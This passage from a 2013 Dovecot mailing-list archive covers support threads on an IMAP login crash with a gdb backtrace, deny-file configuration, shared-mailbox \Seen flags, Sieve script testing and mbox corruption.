bug fixed with yesterday's patch: > http://hg.dovecot.org/dovecot-2.2/rev/3056feb418b1 ? Today's patch :) But yes, that one. And since it happens only with corrupted dboxes anyway I guess it's not actually that bad. Oh, almost forgot to fix this for sdbox also: http://hg.dovecot.org/dovecot-2.2/rev/07642120b6ea From tss at iki.fi Tue Jun 18 18:56:51 2013 From: tss at iki.fi (Timo Sirainen) Date: Tue, 18 Jun 2013 18:56:51 +0300 Subject: [Dovecot] Crashes at login time with freshest code In-Reply-To: <51C0796C.3020104@gmail.com> References: <51C0796C.3020104@gmail.com> Message-ID: <97686DB2-42F8-479C-ACDB-C8E1B7F95190@iki.fi> On 18.6.2013, at 18.14, interfaSys s?rl wrote: > Hello, > > Dovecot keeps crashing at login time. Things were fine on 2.2.2 > Fatal: master: service(imap): child 5014 killed with signal 11 > > Here is the trace: > Core was generated by `imap'. > Program terminated with signal 11, Segmentation fault. > #0 0x00000000105cdfdf in mailbox_list_get_storage (list=0x7fffffffe310, > vname=0x10a04ab0 "INBOX/spam", storage_r=0x7fffffffe308) > at mailbox-list.c:811 > 811 if (set != NULL && set->driver[0] != '\0') { Fixed: http://hg.dovecot.org/dovecot-2.2/rev/8a81c5a1b60f From frank.bonnet at esiee.fr Tue Jun 18 18:59:08 2013 From: frank.bonnet at esiee.fr (BONNET, Frank) Date: Tue, 18 Jun 2013 17:59:08 +0200 Subject: [Dovecot] deny users Message-ID: hello I'm in trouble with the deny feature the log is like the following Jun 18 17:37:53 auth: Error: Error in configuration file /usr/local/etc/dovecot/deny.imap line 1: Expecting '=' in the documentation said to write one username per line in the deny file that is what I did ...what is the format of this file ? thank you From tss at iki.fi Tue Jun 18 19:05:47 2013 From: tss at iki.fi (Timo Sirainen) Date: Tue, 18 Jun 2013 19:05:47 +0300 Subject: [Dovecot] deny users In-Reply-To: References: Message-ID: <2648DF3E-9115-4DB0-B2ED-B02A2A17D8FE@iki.fi> On 18.6.2013, at 18.59, "BONNET, Frank" wrote: > I'm in trouble with the deny feature > the log is like the following > > Jun 18 17:37:53 auth: Error: Error in configuration file > /usr/local/etc/dovecot/deny.imap line 1: Expecting '=' It's not a configuration file. > in the documentation said to write one username per line in the deny file > that is what I did ...what is the format of this file ? The file format is correct. Your configuration for it isn't. What's your doveconf -n? Is this file getting !included? From interfasys at gmail.com Tue Jun 18 19:11:21 2013 From: interfasys at gmail.com (=?UTF-8?B?aW50ZXJmYVN5cyBzw6BybA==?=) Date: Tue, 18 Jun 2013 18:11:21 +0200 Subject: [Dovecot] Crashes at login time with freshest code In-Reply-To: <20130618173338.45744aff@pccw> References: <51C0796C.3020104@gmail.com> <20130618173338.45744aff@pccw> Message-ID: <51C086A9.2070805@gmail.com> Hello Chris, You are right. Autocreated and autosubscribed. And we're using mdbox. It seems Timo has fixed the issue in the repository. I'll report back if it isn't the case. Cheers, Olivier On 18/06/2013 17:33, Christian Wiese wrote: > Hi Olivier, > > I think I am hitting the same issue on a test machine, but I didn't had > the time yet to debug it properly. > > Is your INBOX/spam folder configured to be auto-created? > > What mailbox format do you use? (I am using maildir) > > Cheers, > Chris > > On Tue, 18 Jun 2013 17:14:52 +0200 > interfaSys s?rl wrote: > >> Hello, >> >> Dovecot keeps crashing at login time. Things were fine on 2.2.2 >> Fatal: master: service(imap): child 5014 killed with signal 11 >> >> Here is the trace: >> Core was generated by `imap'. >> Program terminated with signal 11, Segmentation fault. >> #0 0x00000000105cdfdf in mailbox_list_get_storage >> (list=0x7fffffffe310, vname=0x10a04ab0 "INBOX/spam", >> storage_r=0x7fffffffe308) at mailbox-list.c:811 >> 811 if (set != NULL && set->driver[0] != '\0') { >> (gdb) bt full >> #0 0x00000000105cdfdf in mailbox_list_get_storage >> (list=0x7fffffffe310, vname=0x10a04ab0 "INBOX/spam", >> storage_r=0x7fffffffe308) at mailbox-list.c:811 >> set = 0x10a89758 >> #1 0x00000000108c2876 in acl_backend_vfile_get_local_dir >> (backend=0x10a33a40, name=0x10a04a48 "INBOX/spam") at >> acl-backend-vfile.c:148 >> ns = 0x10a5d3c0 >> list = 0x10a45040 >> storage = 0xb >> type = MAILBOX_LIST_PATH_TYPE_DIR >> dir = 0x10a1a250 "INBOX/spam" >> inbox = 0x1055dcc0 "\200\334U\020" >> vname = 0x10a04ab0 "INBOX/spam" >> error = 0x0 >> __FUNCTION__ = "acl_backend_vfile_get_local_dir" >> #2 0x00000000108c2a6c in acl_backend_vfile_object_init >> (_backend=0x10a33a40, name=0x10a04a48 "INBOX/spam") at >> acl-backend-vfile.c:195 >> _data_stack_cur_id = 9 >> backend = 0x10a33a40 >> aclobj = 0x10a8c380 >> dir = 0x10a04a68 "\003" >> vname = 0x10a45258 "\220R\244\020" >> #3 0x00000000108c05a2 in acl_object_init_from_name >> (backend=0x10a33a40, name=0x10a04a48 "INBOX/spam") at acl-api.c:15 >> No locals. >> #4 0x00000000108ca3d7 in acl_mailbox_list_have_right >> (list=0x10a45040, name=0x10a04a48 "INBOX/spam", parent=false, >> acl_storage_right_idx=0, can_see_r=0x0) at acl-mailbox-list.c:63 >> alist = 0x10a45328 >> backend = 0x10a33a40 >> idx_arr = 0x10a453f8 >> aclobj = 0x1ffffe420 >> ret = 0 >> ret2 = 10 >> #5 0x00000000108cad9c in acl_mailbox_list_info_is_visible >> (ctx=0x10a11040) at acl-mailbox-list.c:336 >> info = 0x10a110a8 >> acl_name = 0x10a04a48 "INBOX/spam" >> ret = 0 >> __FUNCTION__ = "acl_mailbox_list_info_is_visible" >> #6 0x00000000108caf36 in acl_mailbox_list_iter_next (_ctx=0x10a11040) >> at acl-mailbox-list.c:386 >> _data_stack_cur_id = 8 >> ctx = 0x10a11040 >> info = 0x10a4a0c0 >> ret = 0 >> #7 0x00000000105e4394 in mailbox_list_iter_next_call (ctx=0x10a11040) >> at mailbox-list-iter.c:941 >> info = 0x10a110a8 >> set = 0x10a11110 >> #8 0x00000000105e44ae in autocreate_iter_next (ctx=0x10a11040) at >> mailbox-list-iter.c:969 >> actx = 0x10a11110 >> info = 0x7fffffffe510 >> autoboxes = 0x10a45040 >> autobox = 0x7fffffffe530 >> count = 4096 >> __FUNCTION__ = "autocreate_iter_next" >> #9 0x00000000105e466c in mailbox_list_iter_next (ctx=0x10a11040) at >> mailbox-list-iter.c:1010 >> _data_stack_cur_id = 7 >> info = 0x10a11118 >> #10 0x00000000108cacd3 in iter_mailbox_has_visible_children >> (ctx=0x10a10840, only_nonpatterns=false) at acl-mailbox-list.c:299 >> iter = 0x10a11040 >> info = 0x10a11118 >> pattern = 0x10a047c8 >> prefix = 0x10a04800 "INBOX/*" >> i = 5 >> prefix_len = 6 >> stars = false >> ret = true >> __FUNCTION__ = "iter_mailbox_has_visible_children" >> #11 0x00000000108cade9 in acl_mailbox_list_info_is_visible >> (ctx=0x10a10840) at acl-mailbox-list.c:345 >> info = 0x10a108a8 >> acl_name = 0x10a047a0 "INBOX" >> ret = 1 >> __FUNCTION__ = "acl_mailbox_list_info_is_visible" >> #12 0x00000000108caf36 in acl_mailbox_list_iter_next (_ctx=0x10a10840) >> at acl-mailbox-list.c:386 >> _data_stack_cur_id = 6 >> ctx = 0x10a10840 >> info = 0x10a490c0 >> ret = 0 >> #13 0x00000000105e4394 in mailbox_list_iter_next_call (ctx=0x10a10840) >> at mailbox-list-iter.c:941 >> info = 0x0 >> set = 0x0 >> #14 0x00000000105e44ae in autocreate_iter_next (ctx=0x10a10840) at >> mailbox-list-iter.c:969 >> actx = 0x10a10910 >> info = 0x7fffffffe6b0 >> autoboxes = 0x2 >> autobox = 0x10a9b000 >> count = 0 >> __FUNCTION__ = "autocreate_iter_next" >> #15 0x00000000105e466c in mailbox_list_iter_next (ctx=0x10a10840) at >> mailbox-list-iter.c:1010 >> _data_stack_cur_id = 5 >> info = 0x10a1b780 >> #16 0x00000000105e343b in mailbox_list_ns_iter_try_next >> (_ctx=0x10a10440, info_r=0x7fffffffe768) at mailbox-list-iter.c:580 >> ctx = 0x10a10440 >> ns = 0x1050912c >> info = 0x10a1b808 >> error = MAIL_ERROR_NONE >> errstr = 0x10a47840 "" >> has_children = false >> __FUNCTION__ = "mailbox_list_ns_iter_try_next" >> #17 0x00000000105e36fc in mailbox_list_ns_iter_next (_ctx=0x10a10440) >> at mailbox-list-iter.c:645 >> info = 0x0 >> #18 0x00000000105e4394 in mailbox_list_iter_next_call (ctx=0x10a10440) >> at mailbox-list-iter.c:941 >> ---Type to continue, or q to quit--- >> info = 0x417e06 >> set = 0x7fffffffe7d0 >> #19 0x00000000105e467e in mailbox_list_iter_next (ctx=0x10a10440) at >> mailbox-list-iter.c:1012 >> _data_stack_cur_id = 4 >> info = 0x2 >> #20 0x000000000041039c in cmd_list_continue (cmd=0x10a47840) at >> cmd-list.c:229 >> ctx = 0x10a47938 >> info = 0x10a10918 >> flags = (MAILBOX_NOCHILDREN | MAILBOX_SELECT) >> str = 0x10a04548 >> mutf7_name = 0x10a04698 >> name = 0x10a10c40 "INBOX" >> ret = 1 >> #21 0x0000000000410c2c in cmd_list_full (cmd=0x10a47840, lsub=false) >> at cmd-list.c:463 >> client = 0x10a47040 >> args = 0x10a100d8 >> list_args = 0x104e15a0 >> arg_count = 32767 >> ctx = 0x10a47938 >> patterns = {arr = {buffer = 0x10a47978, element_size = 8}, v = >> 0x10a47978, v_modifiable = 0x10a47978} >> ref = 0x10a47968 "" >> pattern = 0x10a47970 "*" >> patterns_strarr = 0x10a479b0 >> str = 0x10a04268 >> #22 0x0000000000410c81 in cmd_list (cmd=0x10a47840) at cmd-list.c:478 >> No locals. >> #23 0x0000000000419e11 in command_exec (cmd=0x10a47840) at >> imap-commands.c:156 >> hook = 0x10a22100 >> ret = false >> #24 0x0000000000418d59 in client_command_input (cmd=0x10a47840) at >> imap-client.c:775 >> client = 0x10a47040 >> command = 0x7fffffffe950 >> __FUNCTION__ = "client_command_input" >> #25 0x0000000000419059 in client_command_input (cmd=0x10a47840) at >> imap-client.c:836 >> client = 0x10a47040 >> command = 0x10a277e0 >> __FUNCTION__ = "client_command_input" >> #26 0x0000000000419179 in client_handle_next_command >> (client=0x10a47040, remove_io_r=0x7fffffffe9dd) at imap-client.c:874 >> No locals. >> #27 0x00000000004191f9 in client_handle_input (client=0x10a47040) at >> imap-client.c:886 >> _data_stack_cur_id = 3 >> ret = false >> remove_io = false >> handled_commands = false >> __FUNCTION__ = "client_handle_input" >> #28 0x000000000041938c in client_input (client=0x10a47040) at >> imap-client.c:928 >> cmd = 0x10a21178 >> output = 0x10a92088 >> bytes = 19 >> __FUNCTION__ = "client_input" >> #29 0x00000000104fc976 in io_loop_call_io (io=0x10a8c2c0) at >> ioloop.c:387 ioloop = 0x10a21040 >> t_id = 2 >> #30 0x00000000104fe46f in io_loop_handler_run (ioloop=0x10a21040) at >> ioloop-kqueue.c:148 >> ctx = 0x10a190a0 >> events = 0x10a50000 >> event = 0x10a50000 >> tv = {tv_sec = 1799, tv_usec = 999497} >> ts = {tv_sec = 1799, tv_nsec = 999497000} >> io = 0x10a8c2c0 >> events_count = 6 >> ret = 1 >> i = 0 >> __FUNCTION__ = "io_loop_handler_run" >> #31 0x00000000104fca19 in io_loop_run (ioloop=0x10a21040) at >> ioloop.c:406 No locals. >> #32 0x0000000010493800 in master_service_run (service=0x10a1b140, >> callback=0x425f06 ) at master-service.c:560 >> No locals. >> #33 0x0000000000426220 in main (argc=1, argv=0x7fffffffebe8) at >> main.c:400 set_roots = {0x42f680 , 0x0} >> login_set = {auth_socket_path = 0x10a04038 "p@\240\020", >> postlogin_socket_path = 0x0, postlogin_timeout_secs = 60, >> callback = 0x425cca , >> failure_callback = 0x425e92 , request_auth_token >> = 1} service_flags = MASTER_SERVICE_FLAG_KEEP_CONFIG_OPEN >> storage_service_flags = >> MAIL_STORAGE_SERVICE_FLAG_DISALLOW_ROOT username = 0x0 >> c = -1 >> >> >> >> Cheers, >> >> Olivier > From ka at pacific.net Tue Jun 18 19:19:16 2013 From: ka at pacific.net (Ken A) Date: Tue, 18 Jun 2013 11:19:16 -0500 Subject: [Dovecot] v2.2.3 released In-Reply-To: <9291E6EE-6735-40E0-B4E4-7F8EF60DE64D@iki.fi> References: <1371418917.5513.3.camel@innu.dovecot.net> <24387671-7A73-465E-A0E3-587C3C10CB61@iki.fi> <51C07B2D.5080508@pacific.net> <9291E6EE-6735-40E0-B4E4-7F8EF60DE64D@iki.fi> Message-ID: <51C08884.6040209@pacific.net> On 6/18/2013 10:54 AM, Timo Sirainen wrote: > On 18.6.2013, at 18.22, Ken A wrote: > >>> sdbox/mdbox users: Don't upgrade just yet.. It seems it may >>> cause "Extension header update points outside header size" errors >>> that don't fix themselves. (Bug 1: Causing this error in the >>> first place, bug 2: not being able to fix it automatically.) >> >> Hi Timo, The latest from http://hg.dovecot.org/dovecot-2.2/ seems >> to fix the dsync errors I was seeing with 2.2.2. Mostly "Error: >> Mailbox INBOX sync: mailbox_delete failed: INBOX can't be >> deleted." > > Normally that shouldn't happen in the first place! But yeah, that fix > was done intentionally. But if INBOX is being deleted all the time > with you there's something wrong. I suspect I'm causing breakage of metadata. I'm preparing to migrate to mdbox from mbox, so I'm rsyncing mboxes to a new server and then running dsync -R -u backup mbox:/ The INBOXes that were generating this error were those that I'd opened using an IMAP client on the new server (testing mailboxes) between rsync/dsync runs. Thanks, Ken > >> Is the extension header bug fixed with yesterday's patch: >> http://hg.dovecot.org/dovecot-2.2/rev/3056feb418b1 ? > > Today's patch :) But yes, that one. And since it happens only with > corrupted dboxes anyway I guess it's not actually that bad. Oh, > almost forgot to fix this for sdbox also: > http://hg.dovecot.org/dovecot-2.2/rev/07642120b6ea > -- Ken Anderson Pacific Internet - http://www.pacific.net From interfasys at gmail.com Tue Jun 18 19:27:51 2013 From: interfasys at gmail.com (=?UTF-8?B?aW50ZXJmYVN5cyBzw6BybA==?=) Date: Tue, 18 Jun 2013 18:27:51 +0200 Subject: [Dovecot] Crashes at login time with freshest code In-Reply-To: <97686DB2-42F8-479C-ACDB-C8E1B7F95190@iki.fi> References: <51C0796C.3020104@gmail.com> <97686DB2-42F8-479C-ACDB-C8E1B7F95190@iki.fi> Message-ID: <51C08A87.7040708@gmail.com> This has fixed it for me. Thank you. On 18/06/2013 17:56, Timo Sirainen wrote: > On 18.6.2013, at 18.14, interfaSys s?rl wrote: > >> Hello, >> >> Dovecot keeps crashing at login time. Things were fine on 2.2.2 >> Fatal: master: service(imap): child 5014 killed with signal 11 >> >> Here is the trace: >> Core was generated by `imap'. >> Program terminated with signal 11, Segmentation fault. >> #0 0x00000000105cdfdf in mailbox_list_get_storage (list=0x7fffffffe310, >> vname=0x10a04ab0 "INBOX/spam", storage_r=0x7fffffffe308) >> at mailbox-list.c:811 >> 811 if (set != NULL && set->driver[0] != '\0') { > > Fixed: http://hg.dovecot.org/dovecot-2.2/rev/8a81c5a1b60f > > > > From jackiellowery at gmail.com Wed Jun 19 05:11:32 2013 From: jackiellowery at gmail.com (Jackie Lowery) Date: Tue, 18 Jun 2013 21:11:32 -0500 Subject: [Dovecot] Pound Sign # in password Message-ID: Is there any way to use a pound sign # in my postfix user password in the dovecot sql configuration file. From frank.bonnet at esiee.fr Wed Jun 19 08:55:29 2013 From: frank.bonnet at esiee.fr (Frank BONNET) Date: Wed, 19 Jun 2013 07:55:29 +0200 Subject: [Dovecot] deny users In-Reply-To: <2648DF3E-9115-4DB0-B2ED-B02A2A17D8FE@iki.fi> References: <2648DF3E-9115-4DB0-B2ED-B02A2A17D8FE@iki.fi> Message-ID: <-5750420624230724042@unknownmsgid> hello Timo thanks for the answer I found my mistake after posting ... overwork since two weeks sorry for the noise Envoy? de mon iPhone. Le 18 juin 2013 ? 18:05, Timo Sirainen a ?crit : > On 18.6.2013, at 18.59, "BONNET, Frank" wrote: > >> I'm in trouble with the deny feature >> the log is like the following >> >> Jun 18 17:37:53 auth: Error: Error in configuration file >> /usr/local/etc/dovecot/deny.imap line 1: Expecting '=' > > It's not a configuration file. > >> in the documentation said to write one username per line in the deny file >> that is what I did ...what is the format of this file ? > > The file format is correct. Your configuration for it isn't. What's your doveconf -n? Is this file getting !included? > From skdovecot at smail.inf.fh-brs.de Wed Jun 19 10:22:54 2013 From: skdovecot at smail.inf.fh-brs.de (Steffen Kaiser) Date: Wed, 19 Jun 2013 09:22:54 +0200 (CEST) Subject: [Dovecot] dovecot creating unknown users In-Reply-To: <51C07E5D.8080302@azurtem.net> References: <51C07E5D.8080302@azurtem.net> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Tue, 18 Jun 2013, Yann Shukor wrote: You have sent the message twice, mayhap you should rephrase it. > I noticed that dovecot is creating user directory structures > for unknown users withinour domain in /var/vmail, even > though we have setup a static users.conf db file. > I tried omiting the "allow_all_users=yes" parameter but > that doesn't seem to be linked to this issue What is the problem / question actually? > Sorry if this has been asked a number of times already > Is there an easy way to search the archives of this > mailinglist ? Google or any other search engine, maybe limit the search to site:dovecot.org, http://dir.gmane.org/gmane.mail.imap.dovecot, http://dovecot.markmail.org/ - -- Steffen Kaiser -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iQEVAwUBUcFcTl3r2wJMiz2NAQKK9AgApenpl8vyTKtmeAAzP+7CcpUxlXdFjQKP g4a0ZdZXrcUjOtp2R9Nr3wa8sZ+ftXtTgtwm6zayX8vA+pETpSGHObo7RlEiHvei Fl0UInOrVvC5mOgRlCi3/clZs6mWvV8itrRAdvh5LAnFpudMazQDUT2nmY0RtMjc yFA8O7QjOTmRJfTCV1JOeCLaFHUZNQh1w/ztqx2/bNUKHFkja1nLucChlpzb8BGT WTXsVsPZTvBlzOunzZm3me+ItdoJYaWkW1HIVOo0Ca5cEw6GHIHiiLp9mWER2y2K I+6lrzuaOJYztzbVVMOMRjHObOS/foL096rhweZSmPNDs6pmxPgkHw== =MO8o -----END PGP SIGNATURE----- From skdovecot at smail.inf.fh-brs.de Wed Jun 19 10:55:37 2013 From: skdovecot at smail.inf.fh-brs.de (Steffen Kaiser) Date: Wed, 19 Jun 2013 09:55:37 +0200 (CEST) Subject: [Dovecot] Allowing clients to test their Sieve scripts In-Reply-To: <6bc53ccd6756418437e22e1141154484@junc.eu> References: <4E0089EE-35D3-411C-8A41-8F5A2BD683FD@froglogic.com> <20130614165035.GA4468@uriel.asininetech.com> <6bc53ccd6756418437e22e1141154484@junc.eu> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Sat, 15 Jun 2013, Benny Pedersen wrote: >> The ManageSieve plugin in Thunderbird does basic syntax checks, to check >> if your Sieve script does what it is supposed to to do, there is >> something like this - https://www.fastmail.fm/docs/sieve/sievetest.php > > code managesive plugin to make it test scripts before commit it to filesystem the ManageSieve from Pigeonhole performs syntax checks before committing the script to the filesystem. - -- Steffen Kaiser -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iQEVAwUBUcFj+V3r2wJMiz2NAQKnsQgAqK2bcnxKzTLGH3SzesBj7irbk7pkDP5t oNOBFucdzqGwJwCUIZhAqf+Uji8NyiUFCLa1wtz9dDIeMX5Ooowp6bH5q3TN2LP/ Jg+43b/nckwXlTcS0xBdOyr6VrYuAWE5cr68tu5RC57u2FLRaSFvQ53n7AIEsRNM ypDwZeCJV+DsMGWp6y3LG5s5b0eMf3zDJtTdaD4Lt0NLU/NMpMvg1olCggUwxf1l Os6JYl2dDLaCfwwpYqM8vT/DRXQ+wtjf08KUIqCku6I2X4n52yhmmfNZ1/5h838/ p0mP2ENmnIuMl7MxE5KTa9M55JdM5+PMbHxQK1f893DJnY8c6yYxTA== =lyOL -----END PGP SIGNATURE----- From skdovecot at smail.inf.fh-brs.de Wed Jun 19 11:25:49 2013 From: skdovecot at smail.inf.fh-brs.de (Steffen Kaiser) Date: Wed, 19 Jun 2013 10:25:49 +0200 (CEST) Subject: [Dovecot] A common, read-only IMAP INBOX for all accounts In-Reply-To: References: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Fri, 14 Jun 2013, Gus wrote: > 2. For testing purposes, I used a perl script (using the Maildir::Lite > module) to create a test > message in this mailbox (it gets stored in the new/ subdirectory, as I > suppose it should). Now > this message shows up as "unread" for all accounts, however when I read it > in an IMAP client > and then refresh the mailbox, it shows up as unread again. Per-user INDEX > directory is writable > and I see some files created there by dovecot, so shouldn't they contain > the \Seen flags that > indicate the message has been read? Is this maybe a client problem and how > can I check that > dovecot actually saves the flag correctly? see http://wiki2.dovecot.org/SharedMailboxes/Public " Maildir: Per-user \Seen flag With Maildir a dovecot-shared file controls if the \Seen flags are shared or private. " The SEEN status is "encoded" in the filesystem in Maildir not Dovecot index file per default. - -- Steffen Kaiser -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iQEVAwUBUcFrDV3r2wJMiz2NAQJD0Qf/YMMSDv09PNFV28TmjCmyoQLtuGBJfpq0 Ew3XyMcVIXleehnQiLPYO1CVJco73b5z40/Vt4yZAt6iHsszE/fw/KtlBsTtQpMF SzNfBMG4BZSAk4xBPhCwDQjIpzuZRMQviZcjpVZ1aFQW8D3PY2m+kzTZvdQ1X4ge KIOE6QUEUVXfwU4vcIpz+Qv7vUY5ZxIHQl2TlqwK3UFL2H+a5o96D8q1b7p8dr7P pVkcZiwdY83dvLBc3ZvFbuMvSRXrwNW1Bk6iEE9SE51+5kRS5UjxubuBmkVbZrls RHoYM42exrnwonHn0eLT9q0Pzg4DTwS03EKLxTDfA95isLrrhY1b2g== =jxUo -----END PGP SIGNATURE----- From skdovecot at smail.inf.fh-brs.de Wed Jun 19 11:00:04 2013 From: skdovecot at smail.inf.fh-brs.de (Steffen Kaiser) Date: Wed, 19 Jun 2013 10:00:04 +0200 (CEST) Subject: [Dovecot] Allowing clients to test their Sieve scripts In-Reply-To: <4E0089EE-35D3-411C-8A41-8F5A2BD683FD@froglogic.com> References: <4E0089EE-35D3-411C-8A41-8F5A2BD683FD@froglogic.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Fri, 14 Jun 2013, Frerich Raabe wrote: > One thing which came up repeatedly is that clients using the IMAP server > I run (using Dovecot 2.1) wonder whether they broke their Sieve scripts, > i.e. it often goes like "I don't know whether I just didn't receive any > mail, or whether my filters broke. Can you check the logs?". > > I then usually just run the sieve-test binary (part of the Pigeonhole > distribution) and send them the output. However, I was wondering - is > there maybe a way for them to try it themselves? Like, maybe a tiny web > server which just prints a form asking for a mail file and a sieve > script, and then it runs sieve-script and prints the output of that? I > wonder how other people do that. you are not referring to syntax errors, do you? Otherwise, this seems to be a nice idea to let users actually _test_ their scripts. However, I wonder how educated they are, in order to paste in a correct "mail file" incl. header and the like. - -- Steffen Kaiser -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iQEVAwUBUcFlBF3r2wJMiz2NAQIWkQf5AS1g63bj00I8nTrt9adYSgkRCXmRVlNi M2TjBAGcRZJ5gpL08dyrGpymOydrkcJdsKjgythloGxzezfPStYCg71FLjfO3dLx 6Y1SDue+Dfn0AS49Zyh1zm6KXy56JFgQSopV4zUum1y9KH7ncskzBlBZobYeTXlN rQXQ1Bim/m1368sCzqFwfD2v0CrFnNDe4YGaydbNIBQrC0WDPGQBWEiIxv4Ovudg Zbsk9NSIWDr/nu2MfvE9m1dhXDX9YxeVZWlYoira//PgQkO81P9zFfJGCH8y1qtl c+Hr1165e8sXunSnfkWRiZP3igoefWTgILZnBVSM9VpL3F1NtKi2uQ== =IhRa -----END PGP SIGNATURE----- From christian.wiese at securepoint.de Wed Jun 19 13:02:15 2013 From: christian.wiese at securepoint.de (Christian Wiese) Date: Wed, 19 Jun 2013 12:02:15 +0200 Subject: [Dovecot] Crashes at login time with freshest code In-Reply-To: <97686DB2-42F8-479C-ACDB-C8E1B7F95190@iki.fi> References: <51C0796C.3020104@gmail.com> <97686DB2-42F8-479C-ACDB-C8E1B7F95190@iki.fi> Message-ID: <20130619120215.43e68972@pccw> Hi Timo, thank you very much for fixing the issue. I can also confirm that it solves the issue I experienced on a test machine after installing 2.2.3. Cheers, Chris On Tue, 18 Jun 2013 18:56:51 +0300 Timo Sirainen wrote: > On 18.6.2013, at 18.14, interfaSys s?rl wrote: > > > Hello, > > > > Dovecot keeps crashing at login time. Things were fine on 2.2.2 > > Fatal: master: service(imap): child 5014 killed with signal 11 > > > > Here is the trace: > > Core was generated by `imap'. > > Program terminated with signal 11, Segmentation fault. > > #0 0x00000000105cdfdf in mailbox_list_get_storage > > (list=0x7fffffffe310, vname=0x10a04ab0 "INBOX/spam", > > storage_r=0x7fffffffe308) at mailbox-list.c:811 > > 811 if (set != NULL && set->driver[0] != '\0') { > > Fixed: http://hg.dovecot.org/dovecot-2.2/rev/8a81c5a1b60f > > -- Kind regards, Mit freundlichen Gr??en, Christian Wiese Follow us on Facebook: Follow us on Twitter: --------------------------------------------------------------------- Securepoint GmbH Christian Wiese Salzstr. 1 D-21335 Lueneburg http://www.securepoint.de Tele: ++49 4131 2401-0 Fax: ++49 4131 2401-50 Lueneburg HRB 1776 --------------------------------------------------------------------- CONFIDENTIALITY : This e-mail and any attachments are confidential and may be privileged. If you are not a named recipient, please notify the sender immediately and do not disclose the contents to another person, use it for any purpose or store or copy the information in any medium. GEHEIMHALTUNGSPFLICHT : Dieses E-Mail und alle damit verbundenen Anlagen sind vertraulich und d?rfen nur bestimmten Personen zug?nglich gemacht werden. Sofern Sie nicht zu den angegebenen Empf?ngern geh?ren, benachrichtigen Sie bitte unverz?glich den Absender. Der Inhalt darf weder an Dritte weitergegeben noch zu anderen Zwecken verwendet werden. Die Informationen d?rfen auch nicht auf einem Datentr?ger gespeichert oder auf einen Datentr?ger kopiert werden. From canobix at gmail.com Wed Jun 19 15:46:34 2013 From: canobix at gmail.com (Gus) Date: Wed, 19 Jun 2013 14:46:34 +0200 Subject: [Dovecot] A common, read-only IMAP INBOX for all accounts In-Reply-To: References: Message-ID: On Wed, Jun 19, 2013 at 10:25 AM, Steffen Kaiser < skdovecot at smail.inf.fh-brs.de> wrote: > see http://wiki2.dovecot.org/**SharedMailboxes/Public > > " > Maildir: Per-user \Seen flag > > With Maildir a dovecot-shared file controls if the \Seen flags are shared > or private. " > > The SEEN status is "encoded" in the filesystem in Maildir not Dovecot > index file per default. > Thanks, yes, I figured it out from a similar discussion going on in here last week. I just created an empty "dovecot-shared" file in that mailbox and it worked like a charm. Checked the docs later - the phrasing that mentions this file is not too clear, maybe adding a note like "make sure you create this (empty) file in the mailbox" would help. Anyway, from the info I gathered, I assume my concept of providing a shared INBOX should work with no problems which is great. From dalevizo at otenet.gr Wed Jun 19 16:00:43 2013 From: dalevizo at otenet.gr (Dimos Alevizos) Date: Wed, 19 Jun 2013 16:00:43 +0300 Subject: [Dovecot] Mbox corruption - Inbox beginning with 'FFrom' or 'FrFrom' Message-ID: <51C1AB7B.9030404@otenet.gr> Hello, we're having some problems with our dovecot setup. I've seen similar problems in the mailing list some years ago but alas wasn't able to find a solution. Our setup is as follows : An MX farm (postfix) sends mails via LMTP to a director farm (dovecot 2.1.12) which proxies pop3/imap/lmtp traffic to a dovecot farm (dovecot 2.1.16). All mailboxes and indexes are on NFS and all servers are Centos. The problem is that at times we see mailboxes (all of them are in mbox format) beginning with FFrom or FrFrom and of course dovecot says it's not a valid mbox file. If we manually remove the offending extra characters from the beginning of the file everything is working again, but often the same user will show the problem again tomorrow. However it's very rare and so far we haven't been able to reproduce the problem. After activating the mail_log plugin hoping it'll help us locate the problem we run across this case : The user (let's call him user at domain.gr) logs in via pop3 and deletes some mails but one of them fails: Jun 19 11:09:18 pop01 dovecot: pop3-login: Login: user=, method=PLAIN, rip=83.235.173.26, lip=83.235.66.40, mpid=1389, secured, session= Jun 19 11:09:18 director5 dovecot: pop3-login: proxy(user at domain.gr): started proxying to 83.235.66.40:110: user=, method=PLAIN, rip=83.235.173.26, lip=83.235.66.65, session= Jun 19 11:09:24 pop01 dovecot: pop3(user at domain.gr): expunge: box=INBOX, uid=20670, msgid=<9f5b1a20a9428ed31a9e7e42ce4411f08d0.20130612070424 at mail84.us2.rsgsv.net>, size=36526 Jun 19 11:09:24 pop01 dovecot: pop3(user at domain.gr): expunge: box=INBOX, uid=20671, msgid=, size=4637 Jun 19 11:09:24 pop01 dovecot: pop3(user at domain.gr): expunge: box=INBOX, uid=20672, msgid=<1113670779560.1111910791405.1470.2.32032003 at scheduler.constantcontact.com>, size=38655 Jun 19 11:09:24 pop01 dovecot: pop3(user at domain.gr): expunge: box=INBOX, uid=20673, msgid=<83600a274c1407c5aa4c263e2592cb54 at debop.gr>, size=1181688 Jun 19 11:09:24 pop01 dovecot: pop3(user at domain.gr): expunge: box=INBOX, uid=20674, msgid=, size=61116 Jun 19 11:09:26 pop01 dovecot: pop3(user at domain.gr): Error: Next message unexpectedly corrupted in mbox file /var/mail/K/Y/V/domain_gr_user_007 at 1 Jun 19 11:09:26 pop01 dovecot: pop3(user at domain.gr): Error: Cached message offset 1 is invalid for mbox file /var/mail/K/Y/V/domain_gr_user_007 Jun 19 11:09:27 pop01 dovecot: pop3(user at domain.gr): Disconnected: Logged out top=0/0, retr=2/1502843, del=122/359, size=137448432 Jun 19 11:09:27 pop01 dovecot: pop3(user at domain.gr): Warning: Our dotlock file /var/mail/K/Y/V/domain_gr_user_007.lock was deleted (locked 9 secs ago, touched 9 secs ago) Jun 19 11:09:27 pop01 dovecot: pop3(user at domain.gr): Error: file_dotlock_delete() failed with mbox file /var/mail/K/Y/V/domain_gr_user_007: No such file or directory Jun 19 11:09:27 director5 dovecot: pop3-login: proxy(user at domain.gr): disconnecting 83.235.173.26 